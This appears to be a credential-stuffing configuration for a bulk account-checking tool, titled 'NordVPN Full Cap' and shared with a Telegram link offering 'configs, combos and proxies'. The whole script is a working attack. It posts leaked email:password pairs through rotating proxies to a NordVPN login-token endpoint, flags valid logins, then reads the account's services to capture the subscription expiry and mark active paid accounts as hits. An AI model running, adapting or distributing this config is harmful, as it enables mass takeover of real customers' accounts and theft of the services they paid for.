[SETTINGS]
{
  "Name": "NordVPN Full Cap by Typhon",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2023-04-08T22:09:24.9977319-05:00",
  "AdditionalInfo": "Join My Telegram for more free configs , combos and proxies + MORE!!!! ---- https://t.me/typhonservices",
  "RequiredPlugins": [],
  "Author": "Typhon#0343",
  "Version": "1.1.3 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "NordVPN Full Cap by @King_Cracked",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://zwyr157wwiu6eior.com/v1/users/tokens" 
  CONTENT "username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "\"message\":\"Invalid password\"}}" 
    KEY "Invalid username\"" 
  KEYCHAIN Retry OR 
    KEY "502: Bad gateway" 

PARSE "<SOURCE>" LR "\"token\":\"" "\"" -> VAR "TOKEN" 

FUNCTION Base64Encode "token:<TOKEN>" -> VAR "TOKENS" 

REQUEST GET "https://zwyr157wwiu6eior.com/v1/users/services" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Basic <TOKENS>" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "created_at" 
  KEYCHAIN Failure OR 
    KEY "[]" 
    KEY "invalid password" 

PARSE "<SOURCE>" LR "\",\"expires_at\":\"" " " CreateEmpty=FALSE -> CAP "EXP" 

FUNCTION DateToUnixTime "yyyy-MM-dd" "<EXP>" -> VAR "Expire" 

FUNCTION CurrentUnixTime -> VAR "now" 

KEYCHECK 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<Expire>" EqualTo "<now>" 
    KEY "<Expire>" LessThan "<now>" 
  KEYCHAIN Success OR 
    KEY "<Expire>" GreaterThan "<now>" 

